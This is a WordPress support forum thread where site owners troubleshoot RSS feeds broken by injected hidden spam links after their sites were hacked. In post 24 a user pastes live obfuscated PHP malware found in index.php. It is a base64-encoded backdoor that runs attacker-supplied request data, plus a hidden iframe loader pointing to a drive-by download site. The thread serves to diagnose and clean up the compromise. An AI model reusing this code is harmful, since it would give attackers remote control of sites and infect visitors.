WordPress.org

Ready to get started?Download WordPress

Forums

Link Spam in embedded RSS (27 posts)

  1. Betelguese
    Member
    Posted 4 years ago #

    Hi, can someone help?

    I have spent months building a site with wordpress, and have a high ranking on Google. Recently the outgoing RSS feed from my site has been not working, running it through a feed validation site I get the resulting error line

    This feed does not validate

    Line 176, column 15:XML parsing error: <unknown.:176:15: junk after document element

    …with a whole load of link spam showing up immediately after this highlighted line…

    <!-- google --><font style="position: absolute;overflow: hidden;height: 0;width: 0">

    When I update wordpress the problem goes away and my RSS feed works, but only to return around 2 days later with the same problem…spam in my RSS feed and it not working. I installed the “bad behaviour” plugin immediately after updating but the problem comes back.

    What can I do, short of wiping my wordpress installation and starting again? I want to act fast as I don’t want my Google rankings effected.

    I have backups of exported XML files from my wordpress site.

    Thanks

  2. esmi
    Forum Moderator
    Posted 4 years ago #

  3. styleanywhere
    Member
    Posted 4 years ago #

    i have the same problem with my feeds.

    "with a whole load of link spam showing up immediately after this highlighted line…"

    i don't know what to do with my feeds too.

    i need help also.

    thanks in advance

  4. styleanywhere
    Member
    Posted 4 years ago #

    @esme:

    does this mean, that the site has been hacked?

    thanks,

  5. Betelguese
    Member
    Posted 4 years ago #

    I'm running wordpress 2.8.6, if I update it then the link spam in my RSS dissapears and the RSS works ok. But then a day or two later the link spam comes back, and my RSS goes down again. I have added security plugins since the hack, but I think this is like shutting the door after the horse has bolted.

    Updating wordpress does not wipe the problem, it just comes back. I think I need to delete wordpress from my web host (justhost) and do a fresh install. I have exported XML files from my WP site to import after I reinstall WP, but I'm not sure if this includes my images.

  6. styleanywhere
    Member
    Posted 4 years ago #

    @Betelguese:

    Hi. I hope you dont mind, did it work? Deleting all wordpress file in the server and installing a new one?

    Thanks

  7. Betelguese
    Member
    Posted 4 years ago #

    Hi

    This is driving me CRAZY !!

    I wiped my wordpress installation and installed a new one, but before this I made a full backup from my host, (maybe containing the hack). I imported a recently made XML backup file into the fresh installation, and it showed up as a basic site with my posts, but without plugins or images.

    I then restored the full backup of my site I made from my host, and my site was completely restored. I have been checking the RSS feed every day and it has been ok, I thought I had got rid of it.

    But now, around a week later the problem has come back.

    (RSS feed contains errors)

    I think I will have to wipe wordpress again, import a recent XML file, and then manually add all my images. A tough job as my site has 64 pages.

    Can anyone offer any suggestions or help?

    I have the "Bad Behaviour", "Project Honeypot", and "secure wordpress" plugins installed, but these do not seem to stop it

    Thanks

  8. Betelguese
    Member
    Posted 4 years ago #

    I think I have located the problem.

    When I view the browser source code I find this dodgy looking line of java script at the bottom of every page on my site.

    </script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>

    Bear with, me I'm a newby at this stuff...

    How do I get rid of this? I have looked through my PHP files, without finding it

  9. addtoany.com is a sharing utility that you added somewhere along the way. It's not dodgy and it's not going to add itself.

    Check your plugins, check footer.php and search your database with Search RegEx for the javascript.

  10. Betelguese
    Member
    Posted 4 years ago #

    Thanks songdogtech,

    Oh yes of course, that url and javascript is just from a plugin I added a while back. I seemed to start getting problems with the hack since I added a Youtube plugin, that could be just a coincidence but will delete it anyway.

    I will try running a plugin called "Exploit Scanner", and also "SearchRegEx" as you said.

    I don't know how these spammers and hackers can sleep at night, spewing their junk all over peoples hard work.

  11. Also see How to Completely Clean a Hacked WordPress Install and check for hidden adminstrators and change your passwords, too.....

  12. Betelguese
    Member
    Posted 4 years ago #

    I cannot get rid of this problem...

    I have deleted my wordpress installation numerous times, and restored backups from before the hack as far as I know, and the RSS still breaks down with inserted spam.

    Now I've wiped and reinstalled wordpress and not even restored any backups, but started my site from scratch with only security plugins installed. A day later the same problem came back with a "junk after document element" error when I ran it through feed validator, showing a whole load of spam.

    My Web host Justhost are no help, they said they will fix the problem but have not. I wrote a detailed email describing what is happening and their reply was "Change your passwords and run a virus checker on your computer"...ridiculous! I have done that plenty of times.

    I am deleting and reinstalling WP and not altering or deleting anything else. When I delete WP, if I then go to my files and see anything that is still there that looks like a WP file, should I be deleting that as well?

    Obviously a fresh install is not removing the problem.

    Any suggestions or help would be very much appreciated...

    Thanks.

  13. Roy
    Member
    Posted 4 years ago #

    Just a thought, when you reinstall, you delete the WP files, but you use the same database? What if that database contains a user that just logs in and inserts the spam?
    Alternally, did you download your theme and upload it again after the new install? What if that theme is full of rogue code?
    Twice you have been referred to the "how to completely clean a hacked wordpress blog", did you read it and do everything it said?

  14. Betelguese
    Member
    Posted 4 years ago #

    As I delete WP it says that the MySQL database, and the MySQL user will be deleted.

    Also yes, I have re uploaded the theme after a new install.

    I have read "how to completely clean a hacked wordpress blog", but I'm slightly unsure about deleting individual files on the server.

    Thanks for the help Gangleri, but I think I will really need to talk to my web host as it seems to be the root of the problem.

  15. Roy
    Member
    Posted 4 years ago #

    Yep, it could very well be another site on the shared server...

  16. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    also, do you deleta ALL files on your server? Do you have anything else running? Any other files, any other programs, etc?

    When I was hacked, the problem never was in my WP installation, it was in 2 other software packages I had running, buried way deep. There were 2 rogue php files in those software packages being used to spam my WP install

  17. Betelguese
    Member
    Posted 4 years ago #

    Hmm...good points Gangleri and RVoodoo !

    This is a tricky one.

    I recently discovered I had anonymous ftp access allowed, this must be set to default on my web host as I've never touched it. That's a definite security hole right there. I have now obviously blocked it.

    I will make doubly sure that it's not a dodgy plugin doing it, and look at other possible sources on the server.

  18. styleanywhere
    Member
    Posted 4 years ago #

    Hi Betelguese,

    I have the same problem, and I coudnt find solution to it. Were you able to fix it?

    Thanks

  19. QuilterChic
    Member
    Posted 4 years ago #

    I am also having the same problem. Did you find a fix?

  20. nymphe
    Member
    Posted 3 years ago #

    I have the same problem as well. I am using wordpress 3.0.1

    Except this rss validation issue I don't have any problems. where can this can be? How is this information called? If you give the address like, yoursite.com/rss, the rss.php script in the wp-includes is called. I've checked those files and they are clean. Where comes the rest?

    This is the result: http://feedvalidator.org/check.cgi?url=turkmac.com%2ffeed

  21. Try deactivating all plugins. If that resolves the issue, reactivate each one individually until you find the cause.

    If that does not resolve the issue, try switching to the Default theme (WordPress 1.5 - 2.9.2) or the Twenty Ten theme (WordPress 3.0 and higher) to rule-out a theme-specific issue (themes can affect feeds).

  22. nymphe
    Member
    Posted 3 years ago #

    Thank you for the quick answer. I already tried that. I switched themes, tried other ones including the standard one and disabled all plugins. RSS junk is there. It begins so:

    <!-- linksnkl --> <style>.zjg{position: absolute; overflow: auto; height: 0; width: 0;}</style><li class=zjg> <a href=http://quietcornerwildlife.com/

  23. I that case, the junk could have been inserted into almost any of the core files. Remain calm and carefully follow this guide. When you're done, you may want to implement some (if not all) of the recommended security measures.

  24. cnymike
    Member
    Posted 3 years ago #

    I noticed the same thing when I tried to publish an RSS feed to Feedburner. Sure enough, I checked the validation and found this hidden code in my index.php file...

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?><?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwppZigkX1JFUVVFU1RbJ2RmcXczMWYnXSkKZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFsnZGZxdzMxZiddKSk7CiRocmVmID0gJ2h0dHA6Ly93d3cucHJvc29mdHdhcmVzdG9yZS5jb20vJzsKJHdvcmRzID0gYXJyYXkoJ1NvZnR3YXJlIFN0b3JlJywgJ01pY3Jvc29mdCBTb2Z0d2FyZScsICdBZG9iZSBTb2Z0d2FyZScsICdBdXRvZGVzayBTb2Z0d2FyZScsICdCb3JsYW5kIFNvZnR3YXJlIHNob3AnLCAnVk13YXJlIFNvZnR3YXJlJywgJ1Nob3AgU29mdHdhcmUnLCAnTUFDIFNvZnR3YXJlJywgJ1dpbmRvd3MgU29mdHdhcmUnLCAnU3ltYW50ZWMgc2hvcCcpOwoka2V5bnVtID0gY291bnQoJHdvcmRzKTsKJGFsdHMgPSAkd29yZHM7CgokciA9IHJhbmQoMCwgMyk7CiRyMiA9IHJhbmQoNCwgNyk7CiRyMyA9IHJhbmQoOCwgJGtleW51bS0xKTsKc2h1ZmZsZSgkYWx0cyk7CmZvcigkaT0wOyAkaTwka2V5bnVtOyAkaSsrKQp7CmlmKCRpPT0kciB8fCAkaT09JHIyIHx8ICRpPT0kcjMpCnsKJHI0ID0gcmFuZCgxLCAzKTsKJHN0ciA9IGltcGxvZGUoIiAiLCBhcnJheV9zbGljZSgkd29yZHMsIDAsIHJhbmQoMSwgaW50dmFsKCRrZXludW0vMikrMSkpKTsKJGFsdHNbJGldID0gIjxoND48YSBocmVmPVwiJGhyZWZcIiBhbHQ9XCIkc3RyXCIgdGl0bGU9XCIkc3RyXCI+U2hvcCAiLiRhbHRzWyRpXS4iPC9hPjwvaDQ+IjsKfQp9CmFycmF5X3B1c2goJGFsdHMsICI8YSBocmVmPVwiJGhyZWZcIj4kaHJlZjwvYT4iKTsKc2h1ZmZsZSgkYWx0cyk7CiRzdHIgPSBpbXBsb2RlKCIgIiwgJGFsdHMpOwppZihwcmVnX21hdGNoKCIvKGNyYXdsKXwoZ29vZ2xlKXwoeWFob28pfChiaW5nKXwoc3B5KXwoYm90KXwocGVybCl8KHB5dGhvbil8KGhvbG1lcyl8KGFsZXhhKXwoYi1vLXQpfChmaW5kbGlua3MpfChpY2hpcm8pfChsYXJiaW4pfChsaW5rKXwobHdwKXwoUHljVVJMKXwoc2NydWJieSl8KHNlYXJjaCl8KHN0YWNrKXwodXBkYXRlZCkvaSIsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpCmVjaG8oIjxkaXYgYWxpZ249Y2VudGVyPiRzdHI8L2Rpdj4iKTsKZWxzZQplY2hvKCI8Zm9udCBzdHlsZT1cInBvc2l0aW9uOi8qKi9hYnNvbHV0ZTtvdmVyZmxvdzovKiovaGlkZGVuOy8qKi93aWR0aDovKiovMFwiPiRzdHI8YSBocmVmPSckaHJlZic+JGhyZWY8L2E+PC9mb250PiIpOw==")); ?>
    <?php eval(base64_decode("aWYocHJlZ19tYXRjaCgiL3J1L2kiLCRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddKSkNCgkJZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9hZGhlc2l2ZXN0cmVuZ3RoLmluL2luLmNnaT8xODQiIGZyYW1lYm9yZGVyPSIwIiB3aWR0aD0iMyIgaGVpZ2h0PSIzIiBzdHlsZT0idmlzaWJpbGl0eTogaGlkZGVuOyI+PC9pZnJhbWU+Jzs=")); ?>

    Not only that, I checked my server file modification dates and found at least one other file that had been hacked, the 404.shtml file which is a host file, not a WordPress file. It had the following code

    <!-- SHTML Wrapper - 404 Not Found -->
    <!--#exec cgi="/cgi-sys/fourohfour.cgi" -->

    My webhost is BlueHost by the way.

    Ominously, I checked another entirely different account I have on BlueHost and it too had the same files hacked. These were also WordPress sites.

    So right now I'm not quite sure if it's WordPress that has the problem, my Webhost, or a combination of both. But I find this deeply troubling.

  25. cnymike
    Member
    Posted 3 years ago #

    I've just discovered others talking about this...
    http://womm.leolincourt.com/fourohfourcgi-is-this-a-website-hack-attempt

    My 404.shtml file had been modified on 10/7/10 while my index.php file had been modified on 10/21/10.

    All my WordPress sites on BlueHost, on two different accounts have been hacked in the same way.

    This is a huge problem that needs more input from others.

  26. bh_WP_fan
    Member
    Posted 3 years ago #

    cnymike: The mentioned 404 page code does *not* appear to be a hack. Yes, the feed looks bad. See the above suggestions for that.

    As for the 404, I do not believe this to be a problem. The following code is the default code loaded into a brand-new generated BlueHost 404 page.

    <!--#exec cgi="/cgi-sys/fourohfour.cgi" -->

    As you can see, it is making a call to a directory called cgi-sys which is on a root level of the server and not accessible to view.

    My guess would be that BlueHost manages the default 404 page in that directory and that, when they made a change to their 404 page, they likely made a change to how their own default 404.shtml files were handled as well.

    You can test this by creating any random subdomain and then checking the files loaded in there by default. Your 404.shtml page will bear that code by default.

  27. cnymike
    Member
    Posted 3 years ago #

    Further research does confirm that the odd looking 404.shtml code is not a hack but a change in system generated 404. It was a coincidental but unrelated event.

    The hack on the index.html file on the other hand is indeed the result of nefarious activity and it's not clear whether it was a plugin, theme or what that caused it. But there it is and the base64 code, once decoded, indicates links to two sites, one of which whose purpose is do a drive-by download to your computer.

    Nasty.

Topic Closed

This topic has been closed to new replies.

About this Topic